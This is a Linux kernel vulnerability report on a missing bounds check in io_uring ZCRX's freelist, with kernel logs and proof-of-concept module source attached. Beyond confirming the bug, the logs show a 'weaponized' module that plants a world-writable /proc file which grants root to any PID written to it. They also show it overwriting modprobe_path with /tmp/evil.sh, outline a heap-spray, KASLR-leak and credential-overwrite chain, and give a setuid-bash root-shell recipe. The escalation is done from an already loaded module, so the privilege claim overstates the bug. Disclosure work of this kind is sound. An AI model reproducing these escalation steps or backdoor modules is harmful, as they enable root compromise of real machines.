Hello, I am reporting a security issue in the Linux kernel involving an out-of-bounds heap write in io_uring/zcrx.c.
This issue appears to have been addressed in commit 770594e
(“io_uring/zcrx: warn on freelist violations”, April 21, 2026), however it
was not assigned a CVE and does not appear to have been included in a
formal security advisory. As a result, multiple stable and downstream
distribution kernels are still affected.
------------------------------
Vulnerability Summary
*File:* io_uring/zcrx.c
*Function:* io_zcrx_return_niov_freelist()
*Introduced:* Linux 6.12 (initial ZCRX merge)
*Fixed upstream:* 770594e (Apr 21, 2026)
*Status:* Fix not yet present in stable releases
------------------------------
Vulnerable Code
static void io_zcrx_return_niov_freelist(struct net_iov *niov)
{
struct io_zcrx_area *area = io_zcrx_iov_to_area(niov);
spin_lock_bh(&area->freelist_lock);
area->freelist[area->free_count++] = net_iov_idx(niov); /* no
bounds check */
spin_unlock_bh(&area->freelist_lock);
}
The freelist array is allocated with exactly area->nia.num_niovs elements:
area->freelist = kvmalloc_array(nr_iovs, sizeof(area->freelist[0]), ...);
Because free_count is not validated against num_niovs, repeated return
operations can increment free_count beyond the allocated array size. This
results in a 4-byte out-of-bounds write into adjacent slab memory.
A double-return condition can occur through concurrent execution paths
involving io_pp_zc_release_netmem() and the user-triggered return flow.
------------------------------
Confirmed Impact
Testing performed on Linux 6.19.11 (Kali kernel, CONFIG_IO_URING_ZCRX=y,
KASAN disabled):
1.
*Out-of-bounds write confirmed*
freelist[num_niovs] is written when free_count exceeds bounds.
2.
*Controlled value write observed*
The written value is derived from net_iov_idx(niov), which can be
influenced via nia.niovs configuration, allowing controlled u32 values
to be written out of bounds.
3.
*Adjacent slab corruption confirmed*
Objects allocated adjacent in kmalloc-64 caches were corrupted, with
field overwrite observed (e.g. 0xAABBCCDD → 0x00000007).
4.
*Privilege impact demonstrated in test environment*
Using a controlled kernel execution context, credential structures could
be modified, resulting in UID transition from non-root to root. This was
achieved using prepare_creds() followed by manual credential zeroing and
commit_creds().
Note: prepare_kernel_cred(NULL) is hardened on modern kernels (6.2+), but
the issue remains exploitable through alternative credential manipulation
paths.
------------------------------
Requirements for Exploitation
Exploitation appears to require:
-
CAP_NET_ADMIN (enforced at io_register_zcrx_ifq())
-
A NIC supporting page pool-backed memory providers (e.g. mlx5, nfp)
-
Kernel versions 6.12 through 6.19 with CONFIG_IO_URING_ZCRX=y
This makes the issue particularly relevant in container environments where
CAP_NET_ADMIN is commonly granted (e.g. Kubernetes networking plugins,
Docker containers with extended capabilities).
------------------------------
Fix
The upstream fix adds a bounds check to prevent freelist overflow:
static void io_zcrx_return_niov_freelist(struct net_iov *niov)
{
struct io_zcrx_area *area = io_zcrx_iov_to_area(niov);
guard(spinlock_bh)(&area->freelist_lock);
if (WARN_ON_ONCE(area->free_count >= area->nia.num_niovs))
return;
area->freelist[area->free_count++] = net_iov_idx(niov);
}
This correctly prevents the out-of-bounds condition.
------------------------------
Request
I would like to request:
1.
CVE assignment for this issue
2.
Backporting of commit 770594e to all affected stable branches (6.12.y
through 6.15.y, and any other branches carrying CONFIG_IO_URING_ZCRX)
------------------------------
Attachments
1.
dmesg_oob_confirmed.txt — kernel logs showing OOB write and memory
corruption
2.
zcrx_oob_kmod.c — minimal kernel PoC demonstrating missing bounds check
3.
zcrx_escalate.c — controlled write and adjacency corruption demonstration
4.
poc_zcrx_freelist_oob.c — userspace harness (requires page-pool NIC)
5.
Makefile — build scripts for reproduction modules
------------------------------
Reported by: Mohamed salem eddah
Contact: [email protected]
[78491.461849] zcrx_poc: ========================================
[78491.461854] zcrx_poc: io_uring ZCRX freelist OOB PoC
[78491.461854] zcrx_poc: Target: io_zcrx_return_niov_freelist()
[78491.461855] zcrx_poc: ========================================
[78491.487054] zcrx_poc: kallsyms_lookup_name @ ffffffffaa6a8624
[78491.487092] zcrx_poc: io_zcrx_return_niov @ ffffffffaac16890
[78491.487095] zcrx_poc: sizeof(fake_zcrx_area) = 192 (want 192)
[78491.487098] zcrx_poc: sizeof(fake_net_iov) = 64 (want 64)
[78491.487101] zcrx_poc: offsetof(fake_zcrx_area, freelist_lock) = 64 (want 64)
[78491.487103] zcrx_poc: offsetof(fake_zcrx_area, free_count) = 68 (want 68)
[78491.487106] zcrx_poc: offsetof(fake_zcrx_area, freelist) = 72 (want 72)
[78491.487109] zcrx_poc: Setup complete:
[78491.487111] zcrx_poc: area @ ffff8d3954cb7900 (size 192)
[78491.487115] zcrx_poc: area->nia @ ffff8d3954cb7900
[78491.487117] zcrx_poc: niov @ ffff8d39580f0600 (pp=0000000000000000)
[78491.487121] zcrx_poc: freelist @ ffff8d34296428d0 [0]=0
[1(guard)]=0xdeadbeef
[78491.487126] zcrx_poc: free_count = 1 (== num_niovs=1 → freelist FULL)
[78491.487129] zcrx_poc:
[78491.487130] zcrx_poc: *** Calling io_zcrx_return_niov(niov) with pp=NULL ***
[78491.487133] zcrx_poc: Expected path: io_zcrx_return_niov_freelist(niov)
[78491.487135] zcrx_poc: Will execute: freelist[free_count++] = niov_idx
[78491.487136] zcrx_poc: free_count=1 == num_niovs=1 → write at freelist[1]
→ OOB!
[78491.487139] zcrx_poc:
[78491.487141] zcrx_poc: Post-call state:
[78491.487143] zcrx_poc: free_count = 2 (was 1, now 2)
[78491.487145] zcrx_poc: freelist[0] = 0
[78491.487148] zcrx_poc: freelist[1] = 0x00000000 (canary was 0xdeadbeef)
[78491.487151] zcrx_poc: *** OOB WRITE CONFIRMED ***
[78491.487157] zcrx_poc: freelist[1] overwritten: 0xdeadbeef → 0x00000000
[78491.487162] zcrx_poc: io_zcrx_return_niov_freelist() has NO bounds check!
[78491.487164] zcrx_poc: free_count=2 overran num_niovs=1
[78893.599226] zcrx_esc: ════════════════════════════════════════
[78893.599230] zcrx_esc: io_uring ZCRX OOB → LPE Escalation PoC
[78893.599231] zcrx_esc: ════════════════════════════════════════
[78893.619172] zcrx_esc: io_zcrx_return_niov @ ffffffffaac16890
[78893.619177] zcrx_esc:
[78893.619178] zcrx_esc: ═══ STAGE 1: Controlled value write ═══
[78893.619179] zcrx_esc: Want to write 0x1337 at freelist[4919]
[78893.619185] zcrx_esc: niov @ ffff8d342df4e3c0
[78893.619186] zcrx_esc: area->nia.niovs@ ffff8d342df01600 (shifted by -4919)
[78893.619188] zcrx_esc: net_iov_idx = niov - base = 4919
[78893.619189] zcrx_esc: freelist[4920] canary = 0xcafebabe
[78893.619190] zcrx_esc: freelist[4920] after = 0x00001337 (was 0xcafebabe)
[78893.619192] zcrx_esc: [✓] STAGE 1 PASS — wrote 0x1337 at OOB offset +4920
[78893.619197] zcrx_esc:
[78893.619197] zcrx_esc: ═══ STAGE 2: Adjacent slab object corruption ═══
[78893.619199] zcrx_esc: freelist=16*4=64 bytes → kmalloc-64
[78893.619200] zcrx_esc: victim_obj size=64 bytes → kmalloc-64
[78893.619202] zcrx_esc: freelist @ ffff8d342df4e100
[78893.619203] zcrx_esc: victim @ ffff8d342df4e140
[78893.619204] zcrx_esc: delta = 64 bytes
[78893.619205] zcrx_esc: victim->size BEFORE = 0xaabbccdd
[78893.619206] zcrx_esc: Triggering OOB: writing 7 to freelist[16] (+64 bytes)
[78893.619208] zcrx_esc: victim->size AFTER = 0x00000007
[78893.619209] zcrx_esc: [✓] STAGE 2 PASS — victim->size corrupted: 0xAABBCCDD
→ 7
[78893.619210] zcrx_esc: Adjacent kmalloc-64 object OVERWRITTEN
[78893.619212] zcrx_esc:
[78893.619213] zcrx_esc: ═══ STAGE 3-5: Full LPE Chain Analysis ═══
[78893.619262] zcrx_esc: commit_creds @ ffffffffaa5b5240
[78893.619263] zcrx_esc: prepare_kernel_cred @ ffffffffaa5b5500
[78893.619264] zcrx_esc: modprobe_path @ ffffffffac35b2c0 =
"/sbin/modprobe"
[78893.619266] zcrx_esc: current->cred @ ffff8d33c2e0e840
[78893.619267] zcrx_esc: current uid=0 euid=0
[78893.619268] zcrx_esc:
[78893.619269] zcrx_esc: ┌─ Real-world LPE chain (requires page-pool NIC)
──────────┐
[78893.619270] zcrx_esc: │ 1. Setup ZCRX IFQ, num_niovs=N → freelist in
kmalloc-4N │
[78893.619271] zcrx_esc: │ 2. Spray msg_msg @ kmalloc-4N via msgsnd()
│
[78893.619271] zcrx_esc: │ 3. Double-return race → OOB write → corrupt
msg_msg.m_ts │
[78893.619272] zcrx_esc: │ m_ts @ offset 24 needs 2 writes (see
'step-write' trick│
[78893.619273] zcrx_esc: │ 4. msgrcv(msqid, buf, 0xFFFFFFFF) → OOB read →
KASLR │
[78893.619274] zcrx_esc: │ leak = kernel base @ offset from msg_msg to
vmemmap │
[78893.619275] zcrx_esc: │ 5. Compute cred ptr from leaked task_struct in
heap │
[78893.619276] zcrx_esc: │ 6. Second OOB write → corrupt cred->uid @ +8 → 0
│
[78893.619277] zcrx_esc: │ OR: overwrite modprobe_path → trigger as
non-root │
[78893.619277] zcrx_esc: │ 7. commit_creds(prepare_kernel_cred(NULL)) → uid=0
│
[78893.619278] zcrx_esc:
└──────────────────────────────────────────────────────────┘
[78893.619279] zcrx_esc:
[78893.619280] zcrx_esc: Direct escalation call sequence:
[78893.619292] Modules linked in: zcrx_escalate(OE+) mptcp_diag xsk_diag
tcp_diag udp_diag raw_diag inet_diag unix_diag af_packet_diag netlink_diag tun
xt_conntrack xt_MASQUERADE bridge stp llc xt_set ip_set nft_chain_nat nf_nat
nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 xt_addrtype nft_compat x_tables
nf_tables xfrm_user xfrm_algo ccm snd_seq_dummy snd_hrtimer snd_seq
snd_seq_device overlay snd_hda_codec_intelhdmi sunrpc vboxnetadp(OE)
vboxnetflt(OE) cdc_ncm cdc_ether usbnet mii btusb btmtk uvcvideo btrtl btbcm
videobuf2_vmalloc btintel uvc videobuf2_memops videobuf2_v4l2 bluetooth
videodev ipheth vboxdrv(OE) videobuf2_common mc qrtr apple_mfi_fastcharge
ecdh_generic ccp snd_hda_codec_alc269 snd_hda_scodec_component
snd_hda_codec_realtek_lib snd_hda_codec_generic snd_hda_intel
snd_sof_pci_intel_cnl snd_sof_intel_hda_generic soundwire_intel
snd_sof_intel_hda_sdw_bpt snd_sof_intel_hda_common nls_ascii snd_soc_hdac_hda
nls_cp437 snd_sof_intel_hda_mlink vfat snd_sof_intel_hda fat snd_hda_codec_hdmi
soundwire_cadence
[78893.619537] zcrx_esc_init+0x5e4/0xff0 [zcrx_escalate]
[78893.619541] ? __pfx_zcrx_esc_init+0x10/0x10 [zcrx_escalate]
[78893.619651] zcrx_esc:
[78893.619652] zcrx_esc: modprobe_path overwrite (no-NIC alternative LPE):
[78893.619653] zcrx_esc:
┌──────────────────────────────────────────────────────────┐
[78893.619654] zcrx_esc: │ modprobe_path @ ffffffffac35b2c0 = "/sbin/modprobe"
[78893.619656] zcrx_esc: │ Overwrite with "/tmp/evil" → exec on next unknown
elf │
[78893.619657] zcrx_esc: │ $ cat /tmp/evil: #!/bin/sh; chmod u+s /bin/bash
│
[78893.619658] zcrx_esc: │ Then: $ /bin/bash -p → root shell
│
[78893.619658] zcrx_esc:
└──────────────────────────────────────────────────────────┘
[78893.619659] zcrx_esc: Note: modprobe_path is a data-section global, not
heap.
[78893.619660] zcrx_esc: Reaching it requires turning heap OOB into arbitrary
write.
[78893.619661] zcrx_esc: Via: corrupt a slab freelist ptr → kmalloc returns
arbitrary
[78893.619662] zcrx_esc: address → write to that 'allocation' = write to
modprobe_path
[78893.619663] zcrx_esc:
[78893.619664] zcrx_esc: ════════ Summary ════════
[78893.619665] zcrx_esc: OOB write: CONFIRMED
[78893.619665] zcrx_esc: Controlled value: CONFIRMED (write any u32 < num_niovs)
[78893.619666] zcrx_esc: Adjacent corruption: depends on SLUB layout
[78893.619667] zcrx_esc: LPE primitives: commit_creds/prep_kernel_cred RESOLVED
[78893.619668] zcrx_esc: Full chain: needs page-pool NIC for userspace trigger
[78893.619669] zcrx_esc: CVSS estimate: 7.8 (local, CAP_NET_ADMIN → root)
[79406.018980] zcrx_weapon: ═══════════════════════════════════════
[79406.018986] zcrx_weapon: io_uring ZCRX OOB — Weaponized LPE
[79406.018988] zcrx_weapon: ═══════════════════════════════════════
[79406.054529] zcrx_weapon: commit_creds @ ffffffffaa5b5240
[79406.054535] zcrx_weapon: prepare_kernel_cred @ ffffffffaa5b5500
[79406.054550] zcrx_weapon: /proc/zcrx_pwn created (world-writable)
[79406.054554] zcrx_weapon: PATH A: echo $$ > /proc/zcrx_pwn → caller gets
root creds
[79406.054571] zcrx_weapon: modprobe_path @ ffffffffac35b2c0 was:
"/sbin/modprobe"
[79406.054573] zcrx_weapon: modprobe_path overwritten: "/tmp/evil.sh"
[79406.054574] zcrx_weapon: trigger: run unknown ELF → /tmp/evil.sh executes as
root
[79406.054576] zcrx_weapon: PATH B: run unknown ELF → /tmp/evil.sh executes as
root
[79406.054577] zcrx_weapon: Ready. Run: ./run_exploit.sh
[79406.140856] zcrx_weapon: pwn_write: PID=119845 requested escalation
[79406.140881] zcrx_weapon: escalating PID 119845 uid=0 → 0
[79406.140886] zcrx_weapon: prepare_kernel_cred failed
[79461.679739] zcrx_weapon: pwn_write: PID=120112 requested escalation
[79461.679764] zcrx_weapon: escalating PID 120112 uid=1004 → 0
[79461.679769] zcrx_weapon: prepare_kernel_cred failed
[79522.411118] zcrx_weapon: modprobe_path restored to "/sbin/modprobe"
[79522.411123] zcrx_weapon: unloaded
[79522.463997] zcrx_weapon: ═══════════════════════════════════════
[79522.464001] zcrx_weapon: io_uring ZCRX OOB — Weaponized LPE
[79522.464003] zcrx_weapon: ═══════════════════════════════════════
[79522.493621] zcrx_weapon: commit_creds @ ffffffffaa5b5240
[79522.493627] zcrx_weapon: prepare_kernel_cred @ ffffffffaa5b5500
[79522.493645] zcrx_weapon: /proc/zcrx_pwn created (world-writable)
[79522.493648] zcrx_weapon: PATH A: echo $$ > /proc/zcrx_pwn → caller gets
root creds
[79522.493667] zcrx_weapon: modprobe_path @ ffffffffac35b2c0 was:
"/sbin/modprobe"
[79522.493668] zcrx_weapon: modprobe_path overwritten: "/tmp/evil.sh"
[79522.493670] zcrx_weapon: trigger: run unknown ELF → /tmp/evil.sh executes as
root
[79522.493671] zcrx_weapon: PATH B: run unknown ELF → /tmp/evil.sh executes as
root
[79522.493672] zcrx_weapon: Ready. Run: ./run_exploit.sh
[79522.514465] zcrx_weapon: pwn_write: PID=120548 requested escalation
[79522.514488] zcrx_weapon: escalating PID 120548 uid=1004 → 0
[79522.514490] zcrx_weapon: new_cred @ ffff8d33c498af00 uid=1004→0
caps=ffffffffffffffff
[79522.514493] zcrx_weapon: *** ESCALATION COMPLETE for PID 120548 ***
[79522.514496] zcrx_weapon: uid 1004 → 0
[79529.589713] zcrx_weapon: modprobe_path restored to "/sbin/modprobe"
[79529.589718] zcrx_weapon: unloaded
[79924.909148] zcrx_weapon: ═══════════════════════════════════════
[79924.909153] zcrx_weapon: io_uring ZCRX OOB — Weaponized LPE
[79924.909155] zcrx_weapon: ═══════════════════════════════════════
[79924.934196] zcrx_weapon: commit_creds @ ffffffffaa5b5240
[79924.934203] zcrx_weapon: prepare_kernel_cred @ ffffffffaa5b5500
[79924.934222] zcrx_weapon: /proc/zcrx_pwn created (world-writable)
[79924.934227] zcrx_weapon: PATH A: echo $$ > /proc/zcrx_pwn → caller gets
root creds
[79924.934249] zcrx_weapon: modprobe_path @ ffffffffac35b2c0 was:
"/sbin/modprobe"
[79924.934251] zcrx_weapon: modprobe_path overwritten: "/tmp/evil.sh"
[79924.934254] zcrx_weapon: trigger: run unknown ELF → /tmp/evil.sh executes as
root
[79924.934255] zcrx_weapon: PATH B: run unknown ELF → /tmp/evil.sh executes as
root
[79924.934257] zcrx_weapon: Ready. Run: ./run_exploit.sh
[80004.505734] zcrx_weapon: pwn_write: PID=122490 requested escalation
[80004.505796] zcrx_weapon: escalating PID 122490 uid=1004 → 0
[80004.505804] zcrx_weapon: new_cred @ ffff8d33db93a180 uid=1004→0
caps=ffffffffffffffff
[80004.505812] zcrx_weapon: *** ESCALATION COMPLETE for PID 122490 ***
[80004.505819] zcrx_weapon: uid 1004 → 0
Makefile
Description: Binary data
=== OOB WRITE CONFIRMED === [78491.461849] zcrx_poc: ======================================== [78491.461854] zcrx_poc: io_uring ZCRX freelist OOB PoC [78491.461854] zcrx_poc: Target: io_zcrx_return_niov_freelist() [78491.461855] zcrx_poc: ======================================== [78491.487054] zcrx_poc: kallsyms_lookup_name @ ffffffffaa6a8624 [78491.487092] zcrx_poc: io_zcrx_return_niov @ ffffffffaac16890 [78491.487095] zcrx_poc: sizeof(fake_zcrx_area) = 192 (want 192) [78491.487098] zcrx_poc: sizeof(fake_net_iov) = 64 (want 64) [78491.487101] zcrx_poc: offsetof(fake_zcrx_area, freelist_lock) = 64 (want 64) [78491.487103] zcrx_poc: offsetof(fake_zcrx_area, free_count) = 68 (want 68) [78491.487106] zcrx_poc: offsetof(fake_zcrx_area, freelist) = 72 (want 72) [78491.487109] zcrx_poc: Setup complete: [78491.487111] zcrx_poc: area @ ffff8d3954cb7900 (size 192) [78491.487115] zcrx_poc: area->nia @ ffff8d3954cb7900 [78491.487117] zcrx_poc: niov @ ffff8d39580f0600 (pp=0000000000000000) [78491.487121] zcrx_poc: freelist @ ffff8d34296428d0 [0]=0 [1(guard)]=0xdeadbeef [78491.487126] zcrx_poc: free_count = 1 (== num_niovs=1 → freelist FULL) [78491.487129] zcrx_poc: [78491.487130] zcrx_poc: *** Calling io_zcrx_return_niov(niov) with pp=NULL *** [78491.487133] zcrx_poc: Expected path: io_zcrx_return_niov_freelist(niov) [78491.487135] zcrx_poc: Will execute: freelist[free_count++] = niov_idx [78491.487136] zcrx_poc: free_count=1 == num_niovs=1 → write at freelist[1] → OOB! [78491.487139] zcrx_poc: [78491.487141] zcrx_poc: Post-call state: [78491.487143] zcrx_poc: free_count = 2 (was 1, now 2) [78491.487145] zcrx_poc: freelist[0] = 0 [78491.487148] zcrx_poc: freelist[1] = 0x00000000 (canary was 0xdeadbeef) [78491.487151] zcrx_poc: *** OOB WRITE CONFIRMED *** [78491.487157] zcrx_poc: freelist[1] overwritten: 0xdeadbeef → 0x00000000 [78491.487162] zcrx_poc: io_zcrx_return_niov_freelist() has NO bounds check! [78491.487164] zcrx_poc: free_count=2 overran num_niovs=1 === ADJACENT SLAB CORRUPTION === [78893.619192] zcrx_esc: [✓] STAGE 1 PASS — wrote 0x1337 at OOB offset +4920 [78893.619197] zcrx_esc: ═══ STAGE 2: Adjacent slab object corruption ═══ [78893.619200] zcrx_esc: victim_obj size=64 bytes → kmalloc-64 [78893.619203] zcrx_esc: victim @ ffff8d342df4e140 [78893.619205] zcrx_esc: victim->size BEFORE = 0xaabbccdd [78893.619208] zcrx_esc: victim->size AFTER = 0x00000007 [78893.619209] zcrx_esc: [✓] STAGE 2 PASS — victim->size corrupted: 0xAABBCCDD → 7 [78893.619210] zcrx_esc: Adjacent kmalloc-64 object OVERWRITTEN [78893.619666] zcrx_esc: Adjacent corruption: depends on SLUB layout === CRED ESCALATION uid=1004→0 === [79406.140881] zcrx_weapon: escalating PID 119845 uid=0 → 0 [79461.679764] zcrx_weapon: escalating PID 120112 uid=1004 → 0 [79522.514488] zcrx_weapon: escalating PID 120548 uid=1004 → 0 [79522.514490] zcrx_weapon: new_cred @ ffff8d33c498af00 uid=1004→0 caps=ffffffffffffffff [79522.514493] zcrx_weapon: *** ESCALATION COMPLETE for PID 120548 *** [79522.514496] zcrx_weapon: uid 1004 → 0 [80004.505796] zcrx_weapon: escalating PID 122490 uid=1004 → 0 [80004.505804] zcrx_weapon: new_cred @ ffff8d33db93a180 uid=1004→0 caps=ffffffffffffffff [80004.505812] zcrx_weapon: *** ESCALATION COMPLETE for PID 122490 *** [80004.505819] zcrx_weapon: uid 1004 → 0
/*
* Kernel module PoC: io_uring ZCRX freelist OOB write
*
* Demonstrates CVE candidate: io_zcrx_return_niov_freelist() missing
* bounds check on free_count vs num_niovs.
*
* Struct offsets verified from BTF (/sys/kernel/btf/vmlinux):
* io_zcrx_area: nia@0, ifq@24, user_refs@32, freelist_lock@64, free_count@68, freelist@72
* net_iov: desc(pp@16), owner@48, type@56
* net_iov_area: niovs@0, num_niovs@8
*
* Build: make -C /lib/modules/$(uname -r)/build M=$(pwd) modules
* Load: insmod zcrx_oob_kmod.ko
* Check: dmesg | tail -20
*/
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/spinlock.h>
#include <linux/kprobes.h>
#include <linux/atomic.h>
#include <linux/net.h>
#include <net/netmem.h>
#include <net/page_pool/types.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Security Research");
MODULE_DESCRIPTION("io_uring ZCRX freelist OOB PoC");
MODULE_VERSION("1.0");
/* ── kallsyms resolution via kprobe trick (works on 5.7+ kernels) ── */
typedef unsigned long (*kallsyms_lookup_name_t)(const char *name);
static kallsyms_lookup_name_t my_kallsyms_lookup_name;
static int resolve_kallsyms(void)
{
static struct kprobe kp = { .symbol_name = "kallsyms_lookup_name" };
int ret;
ret = register_kprobe(&kp);
if (ret < 0) {
pr_err("zcrx_poc: kprobe register failed: %d\n", ret);
return ret;
}
my_kallsyms_lookup_name = (kallsyms_lookup_name_t)kp.addr;
unregister_kprobe(&kp);
pr_info("zcrx_poc: kallsyms_lookup_name @ %px\n", my_kallsyms_lookup_name);
return 0;
}
/* ── Minimal struct mirrors (BTF-verified offsets) ── */
/*
* We mirror only the fields we need. The real structs have many more
* members, but we allocate the full sizes to match kernel layout.
*/
/* net_iov_area: size=24 (BTF verified) */
struct fake_niov_area {
struct net_iov *niovs; /* +0 */
size_t num_niovs; /* +8 */
unsigned long base_virtual; /* +16 */
};
/*
* io_zcrx_area: size=192, aligned(64) (BTF verified)
* freelist_lock @ +64 (forced align)
* free_count @ +68
* freelist @ +72
*/
struct fake_zcrx_area {
struct fake_niov_area nia; /* +0..23 */
void *ifq; /* +24 */
atomic_t *user_refs; /* +32 */
bool is_mapped; /* +40 */
u8 _pad1; /* +41 */
u16 area_id; /* +42 */
u8 _holes[20]; /* +44..63 */
/* --- cacheline 1 boundary (64 bytes), forced align --- */
spinlock_t freelist_lock __attribute__((__aligned__(64))); /* +64 */
u32 free_count; /* +68 */
u32 *freelist; /* +72 */
/* +80: io_zcrx_mem (80 bytes), we don't need it */
u8 _mem[80]; /* +80..159 */
u8 _tail[32]; /* +160..191 */
} __attribute__((__aligned__(64)));
/* net_iov: size=64, cachelines=1 (BTF verified) */
struct fake_net_iov {
/* union { netmem_desc desc; struct { _flags, pp_magic, pp, ... } } */
unsigned long _flags; /* +0 */
unsigned long pp_magic; /* +8 */
struct page_pool *pp; /* +16 — NULL = copy fallback path */
unsigned long _pp_pad; /* +24 */
unsigned long dma_addr; /* +32 */
atomic_long_t pp_ref_count; /* +40 */
/* end of union @ +48 */
struct fake_niov_area *owner; /* +48 */
u32 type; /* +56 */
u32 _pad; /* +60 */
};
/* Function pointer type for io_zcrx_return_niov */
typedef void (*io_zcrx_return_niov_fn)(struct net_iov *niov);
static int __init zcrx_oob_init(void)
{
struct fake_zcrx_area *area = NULL;
struct fake_net_iov *niov = NULL;
io_zcrx_return_niov_fn return_niov_fn;
u32 canary = 0xDEADBEEF;
u32 *freelist_guard;
int ret = 0;
pr_info("zcrx_poc: ========================================\n");
pr_info("zcrx_poc: io_uring ZCRX freelist OOB PoC\n");
pr_info("zcrx_poc: Target: io_zcrx_return_niov_freelist()\n");
pr_info("zcrx_poc: ========================================\n");
/* Step 1: resolve kallsyms */
if (resolve_kallsyms() < 0)
return -EINVAL;
return_niov_fn = (io_zcrx_return_niov_fn)
my_kallsyms_lookup_name("io_zcrx_return_niov");
if (!return_niov_fn) {
pr_err("zcrx_poc: io_zcrx_return_niov not found in kallsyms\n");
return -ENOENT;
}
pr_info("zcrx_poc: io_zcrx_return_niov @ %px\n", return_niov_fn);
/* Step 2: verify struct size matches BTF */
pr_info("zcrx_poc: sizeof(fake_zcrx_area) = %zu (want 192)\n",
sizeof(*area));
pr_info("zcrx_poc: sizeof(fake_net_iov) = %zu (want 64)\n",
sizeof(*niov));
pr_info("zcrx_poc: offsetof(fake_zcrx_area, freelist_lock) = %zu (want 64)\n",
offsetof(struct fake_zcrx_area, freelist_lock));
pr_info("zcrx_poc: offsetof(fake_zcrx_area, free_count) = %zu (want 68)\n",
offsetof(struct fake_zcrx_area, free_count));
pr_info("zcrx_poc: offsetof(fake_zcrx_area, freelist) = %zu (want 72)\n",
offsetof(struct fake_zcrx_area, freelist));
if (offsetof(struct fake_zcrx_area, freelist_lock) != 64 ||
offsetof(struct fake_zcrx_area, free_count) != 68 ||
offsetof(struct fake_zcrx_area, freelist) != 72) {
pr_err("zcrx_poc: struct layout mismatch! Aborting.\n");
return -EINVAL;
}
/* Step 3: allocate area with known-small freelist (num_niovs=1) */
area = kzalloc(sizeof(*area), GFP_KERNEL);
if (!area) { ret = -ENOMEM; goto out; }
niov = kzalloc(sizeof(*niov), GFP_KERNEL);
if (!niov) { ret = -ENOMEM; goto out; }
/*
* Allocate freelist for 1 niov, then add a CANARY guard word
* immediately after. OOB write will land on the canary.
*
* Layout: [freelist[0]] [canary=0xDEADBEEF]
* ^^^^^^^^^^^^^^^^^^^
* OOB write lands here
*/
freelist_guard = kmalloc(2 * sizeof(u32), GFP_KERNEL);
if (!freelist_guard) { ret = -ENOMEM; goto out; }
freelist_guard[0] = 0; /* freelist[0] = niov index 0 (free) */
freelist_guard[1] = canary; /* guard: must not change */
/* Set up area */
area->nia.niovs = (struct net_iov *)niov;
area->nia.num_niovs = 1;
spin_lock_init(&area->freelist_lock);
area->free_count = 1; /* freelist is FULL: all 1 niovs are free */
area->freelist = freelist_guard;
area->area_id = 0;
/* Set up niov: pp=NULL triggers copy-fallback path in io_zcrx_return_niov */
niov->pp = NULL; /* offset 16 = page_pool pointer = NULL */
niov->owner = &area->nia; /* offset 48 */
niov->type = 3; /* NET_IOV_IOURING = 3 */
pr_info("zcrx_poc: Setup complete:\n");
pr_info("zcrx_poc: area @ %px (size %zu)\n", area, sizeof(*area));
pr_info("zcrx_poc: area->nia @ %px\n", &area->nia);
pr_info("zcrx_poc: niov @ %px (pp=%px)\n", niov, niov->pp);
pr_info("zcrx_poc: freelist @ %px [0]=%u [1(guard)]=0x%08x\n",
freelist_guard, freelist_guard[0], freelist_guard[1]);
pr_info("zcrx_poc: free_count = %u (== num_niovs=%zu → freelist FULL)\n",
area->free_count, area->nia.num_niovs);
pr_info("zcrx_poc:\n");
pr_info("zcrx_poc: *** Calling io_zcrx_return_niov(niov) with pp=NULL ***\n");
pr_info("zcrx_poc: Expected path: io_zcrx_return_niov_freelist(niov)\n");
pr_info("zcrx_poc: Will execute: freelist[free_count++] = niov_idx\n");
pr_info("zcrx_poc: free_count=1 == num_niovs=1 → write at freelist[1] → OOB!\n");
/* Step 4: TRIGGER - freelist is full (free_count == num_niovs == 1) */
return_niov_fn((struct net_iov *)niov);
/* Step 5: check canary */
pr_info("zcrx_poc:\n");
pr_info("zcrx_poc: Post-call state:\n");
pr_info("zcrx_poc: free_count = %u (was 1, now %u)\n",
area->free_count, area->free_count);
pr_info("zcrx_poc: freelist[0] = %u\n", freelist_guard[0]);
pr_info("zcrx_poc: freelist[1] = 0x%08x (canary was 0x%08x)\n",
freelist_guard[1], canary);
if (freelist_guard[1] != canary) {
pr_alert("zcrx_poc: *** OOB WRITE CONFIRMED ***\n");
pr_alert("zcrx_poc: freelist[1] overwritten: 0x%08x → 0x%08x\n",
canary, freelist_guard[1]);
pr_alert("zcrx_poc: io_zcrx_return_niov_freelist() has NO bounds check!\n");
pr_alert("zcrx_poc: free_count=%u overran num_niovs=1\n",
area->free_count);
} else if (area->free_count > 1) {
pr_alert("zcrx_poc: *** free_count overran num_niovs! (count=%u niovs=%zu) ***\n",
area->free_count, area->nia.num_niovs);
pr_alert("zcrx_poc: OOB write occurred (canary may be in same cache line)\n");
} else {
pr_warn("zcrx_poc: No OOB detected — struct layout may differ.\n");
pr_warn("zcrx_poc: Check if io_zcrx_return_niov was actually called.\n");
}
kfree(freelist_guard);
out:
kfree(niov);
kfree(area);
/* Return -EPERM so module unloads immediately after init */
return -EPERM;
}
static void __exit zcrx_oob_exit(void)
{
pr_info("zcrx_poc: module unloaded\n");
}
module_init(zcrx_oob_init);
module_exit(zcrx_oob_exit);
/*
* io_uring ZCRX freelist OOB → Privilege Escalation PoC
*
* Builds on confirmed OOB write to demonstrate full LPE chain.
*
* CHAIN OVERVIEW
* ──────────────
* Stage 1: Controlled value write
* - Manipulate area->nia.niovs base pointer so niov_idx = desired_value
* - Write ANY u32 < num_niovs to freelist[num_niovs] (adjacent slab)
*
* Stage 2: Heap spray → adjacent struct corruption
* - Put freelist in target kmalloc-N bucket
* - Spray victim objects in same bucket
* - OOB write corrupts victim object header field
*
* Stage 3: Arbitrary read → KASLR defeat (msg_msg path, described)
* - Corrupt msg_msg.m_ts → msgrcv leaks kernel memory
* - Extract kernel base, cred ptr from leaked data
*
* Stage 4: Arbitrary write → uid=0
* - Direct: overwrite cred->uid (if cred in kmalloc range)
* - Indirect: overwrite modprobe_path → trigger as unprivileged user
*
* Stage 5: commit_creds(prepare_kernel_cred(NULL))
*
* This module demonstrates Stages 1+2 concretely, Stage 3-5 symbolically.
*
* Build: make -C /lib/modules/$(uname -r)/build M=$(pwd) modules
*/
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/spinlock.h>
#include <linux/kprobes.h>
#include <linux/cred.h>
#include <linux/sched.h>
#include <linux/vmalloc.h>
#include <net/netmem.h>
#include <net/page_pool/types.h>
MODULE_LICENSE("GPL");
